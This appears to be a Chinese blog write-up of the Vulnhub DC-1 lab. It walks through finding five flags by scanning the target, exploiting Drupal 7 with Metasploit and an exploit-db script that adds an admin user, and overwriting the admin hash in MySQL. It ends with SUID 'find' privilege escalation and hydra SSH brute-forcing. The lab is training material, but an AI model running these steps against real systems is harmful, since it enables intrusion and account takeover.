Vulnhub靶场——DC-1

记一次Vulnhub靶场练习记录

靶机DC-1下载地址:

官方地址,如果觉得下载太慢可以发私信找我要
https://download.vulnhub.com/dc/DC-1.zip

该靶场共有5个flag,下面我们一个一个寻找

打开靶机,使用kali进行局域网地址扫描
方法一、

arp-scan -l


方法二、
查看本机IP

ip addr

nmap -sP 192.168.101.0/24

发现目标主机后检测其开放的端口

nmap -A -p- 192.168.101.11

发现开启了80端口,在浏览器查看页面信息

使用kali的Metasploit工具检查Drupal网站存在的漏洞

使用相对较新的漏洞成功率会高一点

顺利拿到shell,查看当前目录下的文件结构

发现flag1.txt,使用cat命令进行查看


得到下一步骤的提示,去查看配置文件
查找后发现CMS的配置文件是网站根目录下的sites/default下的setting.php文件
查看文件信息

在这里发现了flag2和数据库用户名和密码的信息

尝试登陆数据库

发现有python工具

发现靶机已安装python 2.7.3,通过pty.spawn()获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'


利用之前拿到的账号密码登陆MySQL

mysql -udbuser -pR0ck3t


成功登陆到MySQL数据库中,查看数据库名


发现users数据表,猜测存储的是用户信息

这里有两个方法获得admin权限
方法一、使用漏洞得到一个具有admin权限的新用户
查看版本信息

cat /var/www/includes/bootstrap.inc | grep VERSION


Drupal版本为7.24
查询攻击脚本信息

searchsploit drupal


可以添加的用户名为admin1,密码为admin1使用适合的攻击脚本进行攻击

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.101.11 -u admin1 -p admin1



查询数据库信息

方法二、更改admin的密码
加密脚本位置在网站根目录下的scripts下,查询网站根目录位置

切换到网站根目录,使用加密脚本生成加密密文

./scripts/password-hash.sh


进入MySQL更改admin密码

update users set pass="$S$D1mTsTyVgtvyORw3IOMad6WA5GlcWXJXFTNIzW670qs055u0/mY9" where uid=1;

查询数据信息

更改成功

在网页进行登陆,在Content中发现flag3


Flag3关键词有perms、find、-exec、shadow
使用find查询有特殊权限suid的命令

find / -perm -4000
find / -type f -perm -u=s 2>/dev/null



发现其中有find命令,使用find命令进行提权
开始尝试

touch aaa
find ./ -name aaa -exec "whoami" \;
find ./ -name aaa -exec "/bin/sh" \;



成功提权

之前在查看网站根目录时发现有一个flag4用户,所以在home目录下应该还有一个flag4目录
进行查看


查看root目录结构


成功拿到全部flag
.
.
.
.
.
.
此系统的flag4用户可以使用hydra工具爆破密码,下载John密码包

wget clone http://www.openwall.com/john/j/john-1.8.0.tar.gz
tar -xvf john-1.8.0.tar.gz
cd john-1.8.0/src
make linux-x86-64

查看/etc/shadow信息

使用如下命令进行暴力破解

hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.101.11 -f -vV -o hydraflag4.ssh


得到flag4的账号密码

login: flag4   password: orange

可以使用ssh进行登陆

如果直接进行了提权操作就不需要对flag4进行暴力破解了,可以直接看到flag4信息,而且flag4用户无法查看/root目录内的文件信息,所以还是直接提权方便一点
.
本文参考文档

https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_41038469/article/details/88409725

原文地址:https://www.cnblogs.com/anweilx/p/12498515.html

时间: 2024-10-01 20:49:03

Vulnhub靶场——DC-1的相关文章

关于红日

红日安全简介红日安全民间团队成立于2016年,专注于APT.威胁情报.漏洞挖掘.企业安全.代码审计.AI安全.CTF竞赛及安全人才培养.团队成员来自奇安信.绿盟.阿里.金融公司.传统行业等公司,且也有部分在校学生与自由职业者.? ? ? 自团队成立以来,已荣获来自CarSRC.字节跳动SRC等企业致谢.团队成员也曾参与DDCTF.XCTF.网鼎怀CTF等多项CTF竞赛,并荣获2018网鼎怀全国网络安全大赛线上第四名等.开源多本安全书籍<Web安全开发实战>.<VulnHub靶场实战指南&

python -m http.server 搭建一个简易web下载服务器

在打vulnhub靶场的时候遇到的一个问题 目录 一.进到需要发送的安装包目录 二.开启http服务 三.访问服务器 一.进到需要发送的安装包目录 比如设置一个专门发送,传输的文件的文件夹,cmd命令打开即可以 二.开启http服务 python2 python -m SimpleHTTPServer 9000 python3 python -m http.server 9000 (这里要注意了,python2跟python3的命令是不一样的,我之前就是上网搜搭建方法,大都是搜到了python3

北斗时间服务器在靶场的应用

关键词:北斗时间服务器,时间服务器 在地域辽阔的导弹和航天试验中,为了实现对.航天器的测量和控制,需要有多台设备和系统,这样的工作必定需要统一的时间.因此在军事领域.航天领域.通信领域.交通领域.电力领域.金融领域等方面时统设备和北斗时间服务器得到了普遍的应用.本文对靶场的系统组成及时统设备或北斗时间服务器的常用授时方式和接口进行简单的介绍.靶场是一个多学科.多层次和高新技术密集的场所.从系统工程的角度来说.它由许多工程学科纵横交织构成了一个完整的大系统,这个大系统工程可以分成六个系统:测试发射

Adobe Acrobat DC

DC: document cloud [云服务] 但是Adobe document cloud包括: Acrobat DC, Adobe sign, 以及Web和移动应用程序. 参考: http://tech.163.com/15/0407/16/AMK5FKAM000915BF.html https://helpx.adobe.com/cn/document-cloud/faq.html 1.全新的Acrobat DC模块 2.随处可用的签名注释 3.新的款平台办公链接和手机应用 4.文件管理

使用ARM模板在Azure中国大规模部署DC/OS集群

容器技术是目前非常流行的技术,尤其是在以Docker作为容器引擎的推动下,让容器的轻量级,可移植,自包含,隔离性等的上了一个新的台阶,目前谈及Dev/Ops,CI/CD很少能够绕过Docker的. Azure在去年就推出了容器服务ACS,以其对开源的全面兼容性,开放性,最全面的编排器(DC/OS, Kubernetes,Swarm)支持而广受好评,但在中国和很多地区,ACS并没有上线,如何在这些地区快速大规模部署容器服务一直是个问题. 而微软更进一步,在11月初,进一步开源了ACS的核心引擎ac

微软Azure云之企业Exchange 2016部署4&mdash;配置DC及AD站点

本节我们将配置辅域控制器及创建Azure云端AD站点,如下图红框所示: 1.首先配置DC01的DNS指向 因为要在已存的林域中建立另一台域控制器,所以首先调整指定新DC的DNS指向 2.添加服务器AD服务角色 3.配置辅助DC 这里选择向已存域域增加DC 设置站点及域还原密码,这里因为还没有建立新站点,所以暂时选择默认站点. 自动配置DNS 指定复制源 指定目录 确认配置后安装 重启后会自动配置完成,用域管理账号登录. 4.调整站点 对于生产环境最好先建立站点后再增加DC.因为如果增加的DC直接

MFC中的DC CDC HDC由来由去理解

MFC中的DC CDC HDC由来由去理解 在此非常感谢博客主的究竟钻研,非常详细的参考资料:http://blog.csdn.net/yam_killer/article/details/7661449

[BZOJ4026]dC Loves Number Theory

试题描述 dC 在秒了BZOJ 上所有的数论题后,感觉萌萌哒,想出了这么一道水题,来拯救日益枯竭的水题资源. 给定一个长度为 n的正整数序列A,有q次询问,每次询问一段区间内所有元素乘积的φ(φ(n)代表1~n 中与n互质的数的个数) .由于答案可能很大,所以请对答案 mod 10^6 + 777. (本题强制在线,所有询问操作的l,r都需要 xor上一次询问的答案 lastans,初始时,lastans = 0) 输入 第一行,两个正整数,N,Q,表示序列的长度和询问的个数. 第二行有N 个正

Windows server 2008 r2在dc中设置权限

一台Windows server 2008 r2独立服务器+AD(活动目录)=DC(域控制器) DC(域控制器)统一管理.c/s结构 工作组:分散管理.对等网 试验环境:一台windows2008dc,一台win7,win7加入域 案例:t271公司是一家高新技术公司,有4个部门(技术部.财务部.营销部.经理部),现在公司要建立一台文件服务器(为了节约成本,和DC放在一起),用于存储公司各部门文件夹,并在部门文件夹下建立各部门员工个人文件夹,应该如何实现? 具体要求如下: 1.经理和管理员可以随